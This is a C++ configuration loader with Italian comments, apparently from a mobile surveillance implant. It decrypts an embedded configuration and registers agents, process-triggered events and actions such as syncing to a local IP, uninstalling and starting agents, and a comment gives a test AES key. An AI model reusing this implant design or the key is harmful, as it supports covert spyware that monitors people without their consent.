#include <exception>
#include "Conf.h"
#include "Status.h"
#include "Encryption.h"

#define STEP_AND_ASSIGN(p, delta, var) 	p += delta; \
										var = *(UINT *)(p);

#define ASSIGN_AND_STEP(p, delta, var) 	var = *(UINT *)(p); \
										p += delta;

#define STEP(p, delta) 	p += delta;

using namespace std;

Conf::Conf() : wConfName(NULL), wEncryptedConfName(NULL), encryptionObj(NULL) {
	UINT len = 0;

	statusObj = Status::self();
	encryptionObj = new(std::nothrow) Encryption(g_AesKey, 128);

	// XXX - I fail delle new dovrebbero lanciare un'eccezione.
	if(encryptionObj == NULL)
		return;

	len = wcslen(g_ConfName);

	wEncryptedConfName = new(std::nothrow) WCHAR[len + 1];

	if(wEncryptedConfName == NULL)
		return;

	memset(wEncryptedConfName, 0x00, (len + 1) * sizeof(WCHAR));
	memcpy(wEncryptedConfName, g_ConfName, len * sizeof(WCHAR));

	wConfName = encryptionObj->DecryptName(wEncryptedConfName, g_AesKey[0]);
}

Conf::~Conf(){
	if(encryptionObj)
		delete encryptionObj;

	if(wConfName)
		free(wConfName);

	if(wEncryptedConfName)
		delete[] wEncryptedConfName;
}

BOOL Conf::ParseAgent(BYTE **pAgent, UINT Num) {
	AgentStruct cfgAgent, *ptr;
	UINT  i;

	memset(&cfgAgent, 0x00, sizeof(AgentStruct));

	// Num = numero di Eventi
	ptr = (pAgentStruct)(*pAgent);
	for(i = 0; i < Num; i++, ptr++){
		cfgAgent.uAgentId = ptr->uAgentId;
		cfgAgent.uAgentStatus = ptr->uAgentStatus;
		cfgAgent.uParamLength = ptr->uParamLength;
		cfgAgent.pParams = NULL;

		if(cfgAgent.uParamLength){
			cfgAgent.pParams = new(std::nothrow) BYTE[cfgAgent.uParamLength];

			if(cfgAgent.pParams == NULL)
				return FALSE;

			memcpy(cfgAgent.pParams, ptr->pParams, cfgAgent.uParamLength);
		}

		statusObj->AddAgent(&cfgAgent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pAgent) = (BYTE *)ptr;

	return TRUE;
}

// Dopo gli eventi non esiste una sezione "azioni" perche' nel formato di
// naga le azioni seguono subito gli eventi, percio' dobbiamo richiamare
// direttamente la ParseActions() al ritorno da questa funzione...
BOOL Conf::ParseEvent(BYTE **pEvent, UINT Num) {
	EventStruct cfgEvent, *ptr;
	UINT i;

	memset(&cfgEvent, 0x00, sizeof(EventStruct));

	// Len = numero di Eventi
	ptr = (pEventStruct)(*pEvent);
	for(i = 0; i < Num; i++, ptr++){
		cfgEvent.uEventType = ptr->uEventType;
		cfgEvent.uActionId = ptr->uActionId;
		cfgEvent.uParamLength = ptr->uParamLength;
		cfgEvent.pParams = NULL;

		if(cfgEvent.uParamLength){
			cfgEvent.pParams = new(std::nothrow) BYTE[cfgEvent.uParamLength];

			if(cfgEvent.pParams == NULL)
				return FALSE;

			memcpy(cfgEvent.pParams, ptr->pParams, cfgEvent.uParamLength);
		}

		statusObj->AddEvent(&cfgEvent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pEvent) = (BYTE *)ptr;

	return TRUE;
}

// Questa funzione passa il puntatore alla struttura che definisce una macro-azione
BOOL Conf::ParseAction(BYTE **pAction, UINT Num) {
	MacroActionStruct cfgAction;
	pActionStruct ptr;
	UINT i, j;

	memset(&cfgAction, 0x00, sizeof(MacroActionStruct));

	// Len = numero di macro-azioni
	for(i = 0; i < Num; i++){
		// Leggi il numero di sotto-azioni per questa macro-azione
		STEP_AND_ASSIGN(pAction, sizeof(UINT), cfgAction.uSubActions)
		cfgAction.pActions = new(std::nothrow) ActionStruct[cfgAction.uSubActions];

		if(cfgAction.pActions == NULL)
			return FALSE;

		// Imposta tutte le sotto-azioni
		ptr = (pActionStruct)(*pAction);
		for(j = 0; j < cfgAction.uSubActions; j++, ptr++){
			cfgAction.pActions[j].uActionType = ptr->uActionType;
			cfgAction.pActions[j].uParamLength = ptr->uParamLength;
			cfgAction.pActions[j].pParams = NULL;

			if(cfgAction.pActions[j].uParamLength){
				cfgAction.pActions[j].pParams = new(std::nothrow) BYTE[cfgAction.pActions[j].uParamLength];

				// XXX - Andrebbe fatto il cleanup se la new fallisce e sono gia' stati allocati
				// degli elementi
				if(cfgAction.pActions[j].pParams == NULL)
					return FALSE;

				memcpy(cfgAction.pActions[j].pParams, ptr->pParams, cfgAction.pActions[j].uParamLength);
			}

		}
		(*pAction) = (BYTE *)ptr;

		statusObj->AddAction(&cfgAction);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}

	return TRUE;
}

BOOL Conf::ParseConfiguration(BYTE **pConf, UINT Num) {
	ConfStruct cfgConf, *ptr;
	UINT i;

	memset(&cfgConf, 0x00, sizeof(ConfStruct));

	// Len = numero di Eventi
	ptr = (pConfStruct)(*pConf);
	for(i = 0; i < Num; i++, ptr++){
		cfgConf.uConfId = ptr->uConfId;
		cfgConf.uParamLength = ptr->uParamLength;
		cfgConf.pParams = NULL;

		if(cfgConf.uParamLength){
			cfgConf.pParams = new(std::nothrow) BYTE[cfgConf.uParamLength];

			if(cfgConf.pParams == NULL)
				return FALSE;

			memcpy(cfgConf.pParams, ptr->pParams, cfgConf.uParamLength);
		}

		statusObj->AddConf(&cfgConf);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pConf) = (BYTE *)ptr;

	return TRUE;
}

/*
La configurazione di test e' cosi' composta:
Eventi:
0 - on process mspaint.exe
1 - on process calc.exe
2 - timer ogni 3 ore

Azioni:
0 - 
0.1 synca su 192.168.100.179

1 - 
1.1 uninstall
1.2 starta un agente

2 -
2.1 uninstall
2.2 synca
2.3 starta un agente


Agenti:
tre attivi

Chiave aes:
37A6259CC0C1DAE299A7866489DFF0BD
*/

// Questa funzione al termine deve liberare il puntatore ai dati decifrati
BOOL Conf::LoadConf() {
	BYTE *pConf = NULL, *pTemp = NULL;
	UINT Len = 0, i = 0, num = 0;

	pConf = encryptionObj->DecryptConf(wEncryptedConfName, &Len);

	if(pConf == NULL || Len == 0)
		return FALSE;

	// pConf punta alla prima DWORD del blocco (lunghezza del file),
	// ci spostiamo in modo da puntare al primo byte della configurazione
	pTemp = pConf + 4;

	// Leggi la sezione relativa agli agenti
	pTemp = MemStringCmp(pConf, AGENT_CONF_DELIMITER, Len);
	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAgent(&pTemp, num) == FALSE){
		delete[] pConf;
		return FALSE;
	}

	// Leggi la sezione relativa agli eventi e poi le azioni
	pTemp = MemStringCmp(pConf, EVENT_CONF_DELIMITER, Len);
	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseEvent(&pTemp, num) == FALSE){
		delete[] pConf;
		return FALSE;
	}

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAction(&pTemp, num) == FALSE){
		delete[] pConf;
		return FALSE;
	}

	// Leggi i parametri di configurazione
	pTemp = MemStringCmp(pConf, MOBIL_CONF_DELIMITER, Len);
	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseConfiguration(&pTemp, num) == FALSE){
		delete[] pConf;
		return FALSE;
	}

	delete[] pConf;
	return TRUE;
}

// XXX - Da implementare, se mai dovesse servire.
BOOL Conf::WriteConf(pGeneralConf pConf) {
	return FALSE;
}

BOOL Conf::RemoveConf(UINT type) {
	if(type == CONFIGURATION_CLEAR){
		FillFile(wConfName);
		return DeleteFile(wConfName);
	}else if(type == CONFIGURATION_ENCRYPTED){
		FillFile(wEncryptedConfName);
		return DeleteFile(wEncryptedConfName);
	}else if(type == CONFIGURATION_ALL){
		FillFile(wConfName);
		if(DeleteFile(wConfName) == FALSE)
			return FALSE;

		FillFile(wEncryptedConfName);
		return DeleteFile(wEncryptedConfName);
	}

	return FALSE;
}

// XXX - Va implementata! Per il momento scriviamo comunque tutto in maniera
// cifrata e leggiamo solo da file cifrati, per cui questa funzione non serve,
// viene lasciata qui per eventuali utilizzi futuri.
BOOL Conf::FillFile(WCHAR *wName) {
	return TRUE;
}

BYTE* Conf::MemStringCmp(BYTE *memory, CHAR *string, UINT uLen)
{
	BYTE *ptr;
	UINT len = 0;
	ptr = memory;

	for(;;) {
		if (!strcmp((CHAR *)ptr, string))
			return (ptr + strlen(string) + 1);

		ptr++;
		len++;

		if(len > uLen)
			return NULL;
	}
}